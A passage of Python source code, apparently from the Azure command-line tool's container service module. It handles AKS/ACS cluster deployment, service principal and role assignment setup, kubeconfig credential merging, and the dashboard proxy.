"location": location, "type": "Microsoft.ContainerService/containerServices", "name": name, "tags": tags, "properties": properties, } template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "resources": [ resource, ], "outputs": outputs, } params = {} if service_principal is not None and client_secret is not None: properties["servicePrincipalProfile"] = { "clientId": service_principal, "secret": "[parameters('clientSecret')]", } template["parameters"] = { "clientSecret": { "type": "secureString", "metadata": { "description": "The client secret for the service principal" } } } params = { "clientSecret": { "value": client_secret } } # Due to SPN replication latency, we do a few retries here max_retry = 30 retry_exception = Exception(None) for _ in range(0, max_retry): try: return _invoke_deployment(cmd, resource_group_name, deployment_name, template, params, validate, no_wait) except CloudError as ex: retry_exception = ex if 'is not valid according to the validation procedure' in ex.message or \ 'The credentials in ServicePrincipalProfile were invalid' in ex.message or \ 'not found in Active Directory tenant' in ex.message: time.sleep(3) else: raise ex raise retry_exception def store_acs_service_principal(subscription_id, client_secret, service_principal, file_name='acsServicePrincipal.json'): obj = {} if client_secret: obj['client_secret'] = client_secret if service_principal: obj['service_principal'] = service_principal config_path = os.path.join(get_config_dir(), file_name) full_config = load_service_principals(config_path=config_path) if not full_config: full_config = {} full_config[subscription_id] = obj with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600), 'w+') as spFile: json.dump(full_config, spFile) def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'): config_path = os.path.join(get_config_dir(), file_name) config = load_service_principals(config_path) if not config: return None return config.get(subscription_id) def load_service_principals(config_path): if not os.path.exists(config_path): return None fd = os.open(config_path, os.O_RDONLY) try: with os.fdopen(fd) as f: return shell_safe_json_parse(f.read()) except: # pylint: disable=bare-except return None def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait, subscription_id=None): from azure.cli.core.profiles import ResourceType DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES) properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental') smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES, subscription_id=subscription_id).deployments if validate: logger.info('==== BEGIN TEMPLATE ====') logger.info(json.dumps(template, indent=2)) logger.info('==== END TEMPLATE ====') if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES): Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES) deployment = Deployment(properties=properties) if validate: validation_poller = smc.validate(resource_group_name, deployment_name, deployment) return LongRunningOperation(cmd.cli_ctx)(validation_poller) return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment) if validate: return smc.validate(resource_group_name, deployment_name, properties) return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties) def k8s_get_credentials(cmd, client, name, resource_group_name, path=os.path.join(os.path.expanduser('~'), '.kube', 'config'), ssh_key_file=None, overwrite_existing=False): """Download and install kubectl credentials from the cluster master :param name: The name of the cluster. :type name: str :param resource_group_name: The name of the resource group. :type resource_group_name: str :param path: Where to install the kubectl config file :type path: str :param ssh_key_file: Path to an SSH key file to use :type ssh_key_file: str """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing) def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing): if ssh_key_file is not None and not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member location = acs_info.location # pylint: disable=no-member user = acs_info.linux_profile.admin_username # pylint: disable=no-member _mkdir_p(os.path.dirname(path)) path_candidate = path ix = 0 while os.path.exists(path_candidate): ix += 1 path_candidate = '{}-{}-{}'.format(path, name, ix) # TODO: this only works for public cloud, need other casing for national clouds acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location), '.kube/config', path_candidate, key_filename=ssh_key_file) # merge things if path_candidate != path: try: merge_kubernetes_configurations(path, path_candidate, overwrite_existing) except yaml.YAMLError as exc: logger.warning('Failed to merge credentials to kube config file: %s', exc) logger.warning('The credentials have been saved to %s', path_candidate) def _handle_merge(existing, addition, key, replace): if not addition.get(key, False): return if not existing.get(key): existing[key] = addition[key] return for i in addition[key]: for j in existing[key]: if not i.get('name', False) or not j.get('name', False): continue if i['name'] == j['name']: if replace or i == j: existing[key].remove(j) else: msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?' overwrite = False try: overwrite = prompt_y_n(msg.format(i['name'])) except NoTTYException: pass if overwrite: existing[key].remove(j) else: msg = 'A different object named {} already exists in {} in your kubeconfig file.' raise CLIError(msg.format(i['name'], key)) existing[key].append(i) def load_kubernetes_configuration(filename): try: with open(filename) as stream: return yaml.safe_load(stream) except (IOError, OSError) as ex: if getattr(ex, 'errno', 0) == errno.ENOENT: raise CLIError('{} does not exist'.format(filename)) raise except (yaml.parser.ParserError, UnicodeDecodeError) as ex: raise CLIError('Error parsing {} ({})'.format(filename, str(ex))) def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None): existing = load_kubernetes_configuration(existing_file) addition = load_kubernetes_configuration(addition_file) if context_name is not None: addition['contexts'][0]['name'] = context_name addition['contexts'][0]['context']['cluster'] = context_name addition['clusters'][0]['name'] = context_name addition['current-context'] = context_name # rename the admin context so it doesn't overwrite the user context for ctx in addition.get('contexts', []): try: if ctx['context']['user'].startswith('clusterAdmin'): admin_name = ctx['name'] + '-admin' addition['current-context'] = ctx['name'] = admin_name break except (KeyError, TypeError): continue if addition is None: raise CLIError('failed to load additional configuration from {}'.format(addition_file)) if existing is None: existing = addition else: _handle_merge(existing, addition, 'clusters', replace) _handle_merge(existing, addition, 'users', replace) _handle_merge(existing, addition, 'contexts', replace) existing['current-context'] = addition['current-context'] # check that ~/.kube/config is only read- and writable by its owner if platform.system() != 'Windows': existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode)) if not existing_file_perms.endswith('600'): logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.', existing_file, existing_file_perms) with open(existing_file, 'w+') as stream: yaml.safe_dump(existing, stream, default_flow_style=False) current_context = addition.get('current-context', 'UNKNOWN') msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file) print(msg) def _get_host_name(acs_info): """ Gets the FQDN from the acs_info object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info is None: raise CLIError('Missing acs_info') if acs_info.master_profile is None: raise CLIError('Missing master_profile') if acs_info.master_profile.fqdn is None: raise CLIError('Missing fqdn') return acs_info.master_profile.fqdn def _get_username(acs_info): """ Gets the admin user name from the Linux profile of the ContainerService object. :param acs_info: ContainerService object from Azure REST API :type acs_info: ContainerService """ if acs_info.linux_profile is not None: return acs_info.linux_profile.admin_username return None def _get_acs_info(cli_ctx, name, resource_group_name): """ Gets the ContainerService object from Azure REST API. :param name: ACS resource name :type name: String :param resource_group_name: Resource group name :type resource_group_name: String """ container_services = cf_container_services(cli_ctx, None) return container_services.get(resource_group_name, name) def _rand_str(n): """ Gets a random string """ choices = string.ascii_lowercase + string.digits return ''.join(random.SystemRandom().choice(choices) for _ in range(n)) def _mkdir_p(path): # http://stackoverflow.com/a/600612 try: os.makedirs(path) except OSError as exc: # Python >2.5 if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count): instance = client.get(resource_group_name, container_service_name) instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member # null out the service principal because otherwise validation complains if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes: instance.service_principal_profile = None # null out the windows profile so that validation doesn't complain about not having the admin password instance.windows_profile = None return client.create_or_update(resource_group_name, container_service_name, instance) def list_container_services(cmd, client, resource_group_name=None): ''' List Container Services. ''' svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \ if resource_group_name else client.list() return list(svc_list) def show_service_principal(client, identifier): object_id = _resolve_service_principal(client, identifier) return client.get(object_id) def _resolve_service_principal(client, identifier): # todo: confirm with graph team that a service principal name must be unique result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier))) if result: return result[0].object_id try: uuid.UUID(identifier) return identifier # assume an object id except ValueError: raise CLIError("service principal '{}' doesn't exist".format(identifier)) def create_application(client, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None, required_resource_accesses=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants, display_name=display_name, identifier_uris=identifier_uris, homepage=homepage, reply_urls=reply_urls, key_credentials=key_creds, password_credentials=password_creds, required_resource_access=required_resource_accesses) try: result = client.create(app_create_param, raw=True) return result.output, result.response.headers["ocp-aad-session-key"] except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. Original error: {}".format(link, ex)) raise def update_application(client, object_id, display_name, homepage, identifier_uris, available_to_other_tenants=False, password=None, reply_urls=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None, required_resource_accesses=None): from azure.graphrbac.models import GraphErrorException password_creds, key_creds = _build_application_creds(password, key_value, key_type, key_usage, start_date, end_date) try: if key_creds: client.update_key_credentials(object_id, key_creds) if password_creds: client.update_password_credentials(object_id, password_creds) if reply_urls: client.patch(object_id, ApplicationUpdateParameters(reply_urls=reply_urls)) return except GraphErrorException as ex: if 'insufficient privileges' in str(ex).lower(): link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long raise CLIError("Directory permission is needed for the current user to register the application. " "For how to configure, please refer '{}'. Original error: {}".format(link, ex)) raise def _build_application_creds(password=None, key_value=None, key_type=None, key_usage=None, start_date=None, end_date=None): if password and key_value: raise CLIError('specify either --password or --key-value, but not both.') if not start_date: start_date = datetime.datetime.utcnow() elif isinstance(start_date, str): start_date = dateutil.parser.parse(start_date) if not end_date: end_date = start_date + relativedelta(years=1) elif isinstance(end_date, str): end_date = dateutil.parser.parse(end_date) key_type = key_type or 'AsymmetricX509Cert' key_usage = key_usage or 'Verify' password_creds = None key_creds = None if password: password_creds = [PasswordCredential(start_date=start_date, end_date=end_date, key_id=str(uuid.uuid4()), value=password)] elif key_value: key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value, key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)] return (password_creds, key_creds) def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None): if rbac_client is None: rbac_client = get_graph_rbac_management_client(cli_ctx) if resolve_app: try: uuid.UUID(identifier) result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier))) except ValueError: result = list(rbac_client.applications.list( filter="identifierUris/any(s:s eq '{}')".format(identifier))) if not result: # assume we get an object id result = [rbac_client.applications.get(identifier)] app_id = result[0].app_id else: app_id = identifier return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True)) def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None): return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope, resolve_assignee=is_service_principal) def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True): from azure.cli.core.profiles import ResourceType, get_sdk factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments definitions_client = factory.role_definitions scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id) role_id = _resolve_role_id(role, scope, definitions_client) # If the cluster has service principal resolve the service principal client id to get the object id, # if not use MSI object id. object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION, 'RoleAssignmentCreateParameters', mod='models', operation_group='role_assignments') parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id) assignment_name = uuid.uuid4() custom_headers = None return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers) def _build_role_scope(resource_group_name, scope, subscription_id): subscription_scope = '/subscriptions/' + subscription_id if scope: if resource_group_name: err = 'Resource group "{}" is redundant because scope is supplied' raise CLIError(err.format(resource_group_name)) elif resource_group_name: scope = subscription_scope + '/resourceGroups/' + resource_group_name else: scope = subscription_scope return scope def _resolve_role_id(role, scope, definitions_client): role_id = None try: uuid.UUID(role) role_id = role except ValueError: pass if not role_id: # retrieve role id role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role))) if not role_defs: raise CLIError("Role '{}' doesn't exist.".format(role)) if len(role_defs) > 1: ids = [r.id for r in role_defs] err = "More than one role matches the given name '{}'. Please pick a value from '{}'" raise CLIError(err.format(role, ids)) role_id = role_defs[0].id return role_id def _resolve_object_id(cli_ctx, assignee): client = get_graph_rbac_management_client(cli_ctx) result = None if assignee.find('@') >= 0: # looks like a user principal name result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee))) if not result: result = list(client.service_principals.list( filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee))) if not result: # assume an object id, let us verify it result = _get_object_stubs(client, [assignee]) # 2+ matches should never happen, so we only check 'no match' here if not result: raise CLIError("No matches in graph database for '{}'".format(assignee)) return result[0].object_id def _get_object_stubs(graph_client, assignees): params = GetObjectsParameters(include_directory_object_references=True, object_ids=assignees) return list(graph_client.objects.get_objects_by_object_ids(params)) def _update_dict(dict1, dict2): cp = dict1.copy() cp.update(dict2) return cp def subnet_role_assignment_exists(cli_ctx, scope): network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7" factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'): if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id): return True return False def aks_check_acr(cmd, client, resource_group_name, name, acr): if not which("kubectl"): raise ValidationError("Can not find kubectl executable in PATH") _, browse_path = tempfile.mkstemp() aks_get_credentials( cmd, client, resource_group_name, name, admin=False, path=browse_path ) # Get kubectl minor version kubectl_minor_version = -1 try: cmd = f"kubectl version -o json --kubeconfig {browse_path}" output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE) jsonS, _ = output.communicate() kubectl_version = json.loads(jsonS) kubectl_minor_version = int(kubectl_version["clientVersion"]["minor"]) kubectl_server_minor_version = int(kubectl_version["serverVersion"]["minor"]) kubectl_server_patch = int(kubectl_version["serverVersion"]["gitVersion"].split(".")[-1]) if kubectl_server_minor_version < 17 or (kubectl_server_minor_version == 17 and kubectl_server_patch < 14): logger.warning('There is a known issue for Kubernetes versions < 1.17.14 when connecting to ' 'ACR using MSI. See https://github.com/kubernetes/kubernetes/pull/96355 for' 'more information.') except subprocess.CalledProcessError as err: raise ValidationError("Could not find kubectl minor version: {}".format(err)) if kubectl_minor_version == -1: raise ValidationError("Failed to get kubectl version") podName = "canipull-" + str(uuid.uuid4()) overrides = { "spec": { "restartPolicy": "Never", "hostNetwork": True, "containers": [ { "securityContext": {"runAsUser": 0}, "name": podName, "image": CONST_CANIPULL_IMAGE, "args": ["-v6", acr], "stdin": True, "stdinOnce": True, "tty": True, "volumeMounts": [ {"name": "azurejson", "mountPath": "/etc/kubernetes"}, {"name": "sslcerts", "mountPath": "/etc/ssl/certs"}, ], } ], "tolerations": [ {"key": "CriticalAddonsOnly", "operator": "Exists"}, {"effect": "NoExecute", "operator": "Exists"}, ], "volumes": [ {"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}}, {"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}}, ], } } try: cmd = [ "kubectl", "run", "--kubeconfig", browse_path, "--rm", "--quiet", "--image", CONST_CANIPULL_IMAGE, "--overrides", json.dumps(overrides), "-it", podName, ] # Support kubectl versons < 1.18 if kubectl_minor_version < 18: cmd += ["--generator=run-pod/v1"] output = subprocess.check_output( cmd, universal_newlines=True, ) except subprocess.CalledProcessError as err: raise CLIError("Failed to check the ACR: {}".format(err)) if output: print(output) else: raise CLIError("Failed to check the ACR.") # pylint: disable=too-many-statements,too-many-branches def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_address='127.0.0.1', listen_port='8001'): # verify the kube-dashboard addon was not disabled instance = client.get(resource_group_name, name) addon_profiles = instance.addon_profiles or {} # addon name is case insensitive addon_profile = next((addon_profiles[k] for k in addon_profiles if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()), ManagedClusterAddonProfile(enabled=False)) # open portal view if addon is not enabled or k8s version >= 1.19.0 if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled): subscription_id = get_subscription_id(cmd.cli_ctx) dashboardURL = ( cmd.cli_ctx.cloud.endpoints.portal + # Azure Portal URL (https://portal.azure.com for public cloud) ('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' '/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name) ) if in_cloud_console(): logger.warning('To view the Kubernetes resources view, please open %s in a new tab', dashboardURL) else: logger.warning('Kubernetes resources view on %s', dashboardURL) if not disable_browser: webbrowser.open_new_tab(dashboardURL) return # otherwise open the kube-dashboard addon if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') _, browse_path = tempfile.mkstemp() aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path) # find the dashboard pod's name try: dashboard_pod = subprocess.check_output( ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name", "--selector", "k8s-app=kubernetes-dashboard"], universal_newlines=True) except subprocess.CalledProcessError as err: raise CLIError('Could not find dashboard pod: {}'.format(err)) if dashboard_pod: # remove any "pods/" or "pod/" prefix from the name dashboard_pod = str(dashboard_pod).split('/')[-1].strip() else: raise CLIError("Couldn't find the Kubernetes dashboard pod.") # find the port try: dashboard_port = subprocess.check_output( ["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--selector", "k8s-app=kubernetes-dashboard", "--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"] ) # output format: b"'{port}'" dashboard_port = int((dashboard_port.decode('utf-8').replace("'", ""))) except subprocess.CalledProcessError as err: raise CLIError('Could not find dashboard port: {}'.format(err)) # use https if dashboard container is using https if dashboard_port == 8443: protocol = 'https' else: protocol = 'http' proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port) dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url, protocol) # launch kubectl port-forward locally to access the remote dashboard if in_cloud_console(): # TODO: better error handling here. response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port)) result = json.loads(response.text) dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format( result['url'], protocol) term_id = os.environ.get('ACC_TERM_ID') if term_id: response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id), json={"url": dashboardURL}) logger.warning('To view the console, please open %s in a new tab', dashboardURL) else: logger.warning('Proxy running on %s', proxy_url) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async(dashboardURL) try: try: subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address", listen_address, "--port", listen_port], stderr=subprocess.STDOUT) except subprocess.CalledProcessError as err: if err.output.find(b'unknown flag: --address'): if listen_address != '127.0.0.1': logger.warning('"--address" is only supported in kubectl v1.13 and later.') logger.warning('The "--listen-address" argument will be ignored.') subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port]) except KeyboardInterrupt: # Let command processing finish gracefully after the user presses [Ctrl+C] pass finally: if in_cloud_console(): requests.post('http://localhost:8888/closeport/8001') def _trim_nodepoolname(nodepool_name): if not nodepool_name: return "nodepool1" return nodepool_name[:12] def _validate_ssh_key(no_ssh_key, ssh_key_value): if not no_ssh_key: try: if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value): raise ValueError() except (TypeError, ValueError): shortened_key = truncate_text(ssh_key_value) raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key)) def _add_monitoring_role_assignment(result, cluster_resource_id, cmd): service_principal_msi_id = None # Check if service principal exists, if it does, assign permissions to service principal # Else, provide permissions to MSI if ( hasattr(result, 'service_principal_profile') and hasattr(result.service_principal_profile, 'client_id') and result.service_principal_profile.client_id.lower() != 'msi' ): logger.info('valid service principal exists, using it') service_principal_msi_id = result.service_principal_profile.client_id is_service_principal = True elif ( (hasattr(result, 'addon_profiles')) and (CONST_MONITORING_ADDON_NAME in result.addon_profiles) and (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and (hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id')) ): logger.info('omsagent MSI exists, using it') service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id is_service_principal = False if service_principal_msi_id is not None: if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher', service_principal_msi_id, is_service_principal, scope=cluster_resource_id): logger.warning('Could not create a role assignment for Monitoring addon. ' 'Are you an Owner on this subscription?') else: logger.warning('Could not find service principal or user assigned MSI for role' 'assignment') def _add_ingress_appgw_addon_role_assignment(result, cmd): service_principal_msi_id = None # Check if service principal exists, if it does, assign permissions to service principal # Else, provide permissions to MSI if ( hasattr(result, 'service_principal_profile') and hasattr(result.service_principal_profile, 'client_id') and result.service_principal_profile.client_id != 'msi' ): service_principal_msi_id = result.service_principal_profile.client_id is_service_principal = True elif ( (hasattr(result, 'addon_profiles')) and (CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and (hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id')) ): service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id is_service_principal = False if service_principal_msi_id is not None: config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config from msrestazure.tools import parse_resource_id, resource_id if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config: appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] parsed_appgw_id = parse_resource_id(appgw_id) appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"], resource_group=parsed_appgw_id["resource_group"]) if not _add_role_assignment(cmd.cli_ctx, 'Contributor', service_principal_msi_id, is_service_principal, scope=appgw_group_id): logger.warning('Could not create a role assignment for application gateway: %s ' 'specified in %s addon. ' 'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME) if CONST_INGRESS_APPGW_SUBNET_ID in config: subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID] if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor', service_principal_msi_id, is_service_principal, scope=subnet_id): logger.warning('Could not create a role assignment for subnet: %s ' 'specified in %s addon. ' 'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME) if CONST_INGRESS_APPGW_SUBNET_CIDR in config: if result.agent_pool_profiles[0].vnet_subnet_id is not None: parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id) vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"], resource_group=parsed_subnet_vnet_id["resource_group"], namespace="Microsoft.Network", type="virtualNetworks", name=parsed_subnet_vnet_id["name"]) if not _add_role_assignment(cmd.cli_ctx, 'Contributor', service_principal_msi_id, is_service_principal, scope=vnet_id): logger.warning('Could not create a role assignment for virtual network: %s ' 'specified in %s addon. ' 'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME) def _add_virtual_node_role_assignment(cmd, result, vnet_subnet_id): # Remove trailing "/subnets/<SUBNET_NAME>" to get the vnet id vnet_id = vnet_subnet_id.rpartition('/')[0] vnet_id = vnet_id.rpartition('/')[0] service_principal_msi_id = None is_service_principal = False os_type = 'Linux' addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type # Check if service principal exists, if it does, assign permissions to service principal # Else, provide permissions to MSI if ( hasattr(result, 'service_principal_profile') and hasattr(result.service_principal_profile, 'client_id') and result.service_principal_profile.client_id.lower() != 'msi' ): logger.info('valid service principal exists, using it') service_principal_msi_id = result.service_principal_profile.client_id is_service_principal = True elif ( (hasattr(result, 'addon_profiles')) and (addon_name in result.addon_profiles) and (hasattr(result.addon_profiles[addon_name], 'identity')) and (hasattr(result.addon_profiles[addon_name].identity, 'object_id')) ): logger.info('virtual node MSI exists, using it') service_principal_msi_id = result.addon_profiles[addon_name].identity.object_id is_service_principal = False if service_principal_msi_id is not None: if not _add_role_assignment(cmd.cli_ctx, 'Contributor', service_principal_msi_id, is_service_principal, scope=vnet_id): logger.warning('Could not create a role assignment for virtual node addon. ' 'Are you an Owner on this subscription?') else: logger.warning('Could not find service principal or user assigned MSI for role' 'assignment') # pylint: disable=too-many-statements,too-many-branches def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals dns_name_prefix=None, location=None, admin_username="azureuser", windows_admin_username=None, windows_admin_password=None, enable_ahub=False, kubernetes_version='', node_vm_size="Standard_DS2_v2", node_osdisk_type=None, node_osdisk_size=0, node_osdisk_diskencryptionset_id=None, node_count=3, nodepool_name="nodepool1", nodepool_tags=None, nodepool_labels=None, service_principal=None, client_secret=None, no_ssh_key=False, disable_rbac=None, enable_rbac=None, vm_set_type=None, skip_subnet_role_assignment=False, enable_cluster_autoscaler=False, cluster_autoscaler_profile=None, network_plugin=None, network_policy=None, uptime_sla=False, pod_cidr=None, service_cidr=None, dns_service_ip=None, docker_bridge_address=None, load_balancer_sku=None, load_balancer_managed_outbound_ip_count=None, load_balancer_outbound_ips=None, load_balancer_outbound_ip_prefixes=None, load_balancer_outbound_ports=None, load_balancer_idle_timeout=None, outbound_type=None, enable_addons=None, workspace_resource_id=None, vnet_subnet_id=None, ppg=None, max_pods=0, min_count=None, max_count=None, aad_client_app_id=None, aad_server_app_id=None, aad_server_app_secret=None, aad_tenant_id=None, tags=None, zones=None, enable_node_public_ip=False, generate_ssh_keys=False, # pylint: disable=unused-argument api_server_authorized_ip_ranges=None, enable_private_cluster=False, enable_managed_identity=True, assign_identity=None, attach_acr=None, enable_aad=False, aad_admin_group_object_ids=None, aci_subnet_name=None, appgw_name=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None, appgw_watch_namespace=None, enable_sgxquotehelper=False, no_wait=False, yes=False): _validate_ssh_key(no_ssh_key, ssh_key_value) subscription_id = get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version) load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version) if api_server_authorized_ip_ranges and load_balancer_sku == "basic": raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer') agent_pool_profile = ManagedClusterAgentPoolProfile( name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it tags=nodepool_tags, node_labels=nodepool_labels, count=int(node_count), vm_size=node_vm_size, os_type="Linux", vnet_subnet_id=vnet_subnet_id, proximity_placement_group_id=ppg, availability_zones=zones, enable_node_public_ip=enable_node_public_ip, max_pods=int(max_pods) if max_pods else None, type=vm_set_type, mode="System" ) if node_osdisk_size: agent_pool_profile.os_disk_size_gb = int(node_osdisk_size) if node_osdisk_type: agent_pool_profile.os_disk_type = node_osdisk_type _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile) linux_profile = None # LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified. if not no_ssh_key: ssh_config = ContainerServiceSshConfiguration( public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)]) linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config) windows_profile = None if windows_admin_username or windows_admin_password: # To avoid that windows_admin_password is set but windows_admin_username is not if windows_admin_username is None: try: from knack.prompting import prompt windows_admin_username = prompt('windows_admin_username: ') # The validation for admin_username in ManagedClusterWindowsProfile will fail even if # users still set windows_admin_username to empty here except NoTTYException: raise CLIError('Please specify username for Windows in non-interactive mode.') if windows_admin_password is None: try: windows_admin_password = prompt_pass( msg='windows-admin-password: ', confirm=True) except NoTTYException: raise CLIError( 'Please specify both username and password in non-interactive mode.') windows_license_type = None if enable_ahub: windows_license_type = 'Windows_Server' windows_profile = ManagedClusterWindowsProfile( admin_username=windows_admin_username, admin_password=windows_admin_password, license_type=windows_license_type) # If customer explicitly provide a service principal, disable managed identity. if service_principal and client_secret: enable_managed_identity = False # Skip create service principal profile for the cluster if the cluster # enables managed identity and customer doesn't explicitly provide a service principal. service_principal_profile = None principal_obj = None if not(enable_managed_identity and not service_principal and not client_secret): principal_obj = _ensure_aks_service_principal(cmd.cli_ctx, service_principal=service_principal, client_secret=client_secret, subscription_id=subscription_id, dns_name_prefix=dns_name_prefix, location=location, name=name) service_principal_profile = 